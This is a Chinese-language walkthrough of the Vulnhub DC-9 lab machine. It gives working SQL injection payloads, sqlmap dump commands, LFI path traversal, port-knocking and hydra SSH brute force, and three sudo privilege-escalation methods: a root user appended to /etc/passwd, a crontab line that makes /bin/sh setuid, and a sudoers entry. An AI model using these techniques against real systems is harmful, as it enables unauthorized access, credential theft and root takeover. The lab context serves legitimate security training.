Vulnhub DC-9靶机渗透

信息搜集

nmap -sP 192.168.146.0/24 #主机发现
nmap -A 192.168.146.147 #扫描端口等信息

22端口过滤，80端口开放，同样的从80端口入手。
不是现成的cms，然后浏览一下发现search的地方有sql注入

#探测
Mary		//正确
Mary'		//错误
Mary'#		//正确

#注入
0' union select 1,2,3,4,5,6#		//6列均可控
0' union select 1,2,3,4,5,database()#		//数据库staff
0' union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema=database()#  		//StaffDetails,Users
0' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='Users'#		//UserID,Username,Password
0' union select 1,2,3,4,5,group_concat(UserID,' | ',Username,' | ',Password) from Users# 		//1 | admin | 856f5de590ef37314e7c3bdf6f8a66dc

解密一下这个md5，https://www.somd5.com/解出来是transorbital1，登陆一下。
index.php

manage.php

看到底部File does not exist，之前的靶机也有类似的，可以猜测可能是LFI（include()），验证一下。
直接和一起一样写file，发现就是这个参数。（当然，一般来说需要fuzz一下，这里我就直接做了）
http://192.168.146.147/manage.php?file=../../../../etc/passwd

emmmm，这里不能直接用绝对路径，只能用相对路径。很多文件读不了，估计是没权限。
这样之前的读日志文件getshell的思路就不行了，需要另辟蹊径。
并且虽然得到了用户名可以尝试hydra爆破，但是之前扫描端口已经看到hydra是给过滤的，所以无法爆破。

许久没有思路。。。

最后尝试找ssh的保护措施。
https://www.ibm.com/developerworks/cn/aix/library/au-sshlocks/index.html
../../../../etc/security/access.conf #决定允许哪些用户登录

都给注释了，而且好像没有john用户啊。。
../../../../etc/knockd.conf #指定端口敲门规则，详细看url

getFlag

可以看到，敲门后22端口就开放了。那就上hydra爆破一下。
hydra -L username.txt -P /usr/share/wordlists/rockyou.txt -t 6 ssh://192.168.146.147

root@kali:/# cat username.txt 
janitor2
janitor
phoebeb
monicag
rossg
joeyt
chandlerb
fredf

看看时间，黑人问号？？？ 这肯定不行呀。 得自己生成个字典。

回到之前sql注入，可以注入出用户名密码，估计可以用来撞库
直接用sqlmap全部跑出来吧。

sqlmap -u http://192.168.146.147/results.php --data="search=1" --dbms mysql --dbs  //information_schema，Staff，还有一个新表users
sqlmap -u http://192.168.146.147/results.php --data="search=1" --dbms mysql -D users -tables    	//UserDetails
sqlmap -u http://192.168.146.147/results.php --data="search=1" --dbms mysql -D users -T UserDetails --columns 		//firstname,id,lastname,password,reg_date,username
sqlmap -u http://192.168.146.147/results.php --data="search=1" --dbms mysql -D users -T UserDetails -C id,firstname,lastname,password --dump

（这哥们估计刷了很多遍friends老友记，Ross，Joey，Rachel都有。。。）

将密码生成字典pwd.txt，再用hydra爆破。hydra -L username.txt -P pwd.txt ssh://192.168.146.147

[22][ssh] host: 192.168.146.147   login: janitor   password: Ilovepeepee
[22][ssh] host: 192.168.146.147   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.146.147   login: chandlerb   password: UrAG0D!

janitor用户目录下有隐藏目录.secrets-for-putin里面有隐藏的密码文件

做成pwd.txt 继续爆破hydra -L username.txt -P pwd.txt -t 6 ssh://192.168.146.147

用这个用户登陆上去。到这个地步差不多就该提权了。
看看sudo权限。sudo -l

可以以root权限执行这个test（elf文件），这肯定有问题了。。。
试了下，直接执行是不行的(因为不知道功能不会用)。大概猜一下就是读read文件，然后添加进append文件？当然要验证下。

然后在上两级目录看到了test.py，看看他的内容。

#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

简单的，就是先打开read指定的文件，然后添加到append指定的文件。
既然可以写文件那就有几个思路了：/etc/passwd文件，/etc/sudoers文件，/etc/crontab文件

写passwd文件

首先了解linux 命令采用5种加密方式和手动生成shadow密码的方法
https://www.cnblogs.com/f-ck-need-u/p/7545187.html
https://qastack.cn/unix/81240/manually-generate-password-for-etc-shadow

①.该列留空，即"::"，表示该用户没有密码。
②.该列为"!"，即":!:"，表示该用户被锁，被锁将无法登陆，但是可能其他的登录方式是不受限制的，如ssh公钥认证的方式，su的方式。
③.该列为"*"，即":*:"，也表示该用户被锁，和"!"效果是一样的。
④.该列以"!"或"!!"开头，则也表示该用户被锁。
⑤.该列为"!!"，即":!!:"，表示该用户从来没设置过密码。
⑥.如果格式为"$id$salt$hashed"，则表示该用户密码正常。其中$id$的id表示密码的加密算法，$1$表示使用MD5算法，$2a$表示使用Blowfish算法，"$2y$"是另一算法长度的Blowfish,"$5$"表示SHA-256算法，而"$6$"表示SHA-512算法，

我们使用下面这条
perl -e 'print crypt("hack", "salt")' #saOlCG7b7vaGw

#使用方式
echo 'A1oe:saOlCG7b7vaGw:0:0::/root:/bin/bash' > /tmp/11.txt
sudo ./test /tmp/11.txt /etc/passwd
su A1oe
Password: hack

crontab文件

参考https://www.cnblogs.com/A1oe/p/12535633.html

fredf@dc-9:/opt/devstuff/dist/test$ echo "* * * * * root chmod 4777 /bin/sh" > /tmp/1.txt
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/1.txt /etc/crontab

写sudoers文件

#使用方法
fredf@dc-9:/opt/devstuff/dist/test$ echo 'fredf ALL=(ALL:ALL) ALL' > /tmp/33.txtfredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/33.txt /etc/sudoers
fredf@dc-9:/opt/devstuff/dist/test$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
    (ALL : ALL) ALL
fredf@dc-9:/opt/devstuff/dist/test$ sudo cat /root/theflag.txt

总结

本次靶机又复习了下基础的sql注入，学习了一下ssh保护措施，一个关于ssh安全的重要配置文件knockd.conf，这个敲对门才能ssh连接还挺好玩的。。
然后就是又root权限来写文件(sudo提权)，简单的就是三个文件了/etc/passwd、/etc/sudoers、/etc/crontab文件。
最后，DC系列靶机完结啦，撒花~，准备开其他坑了。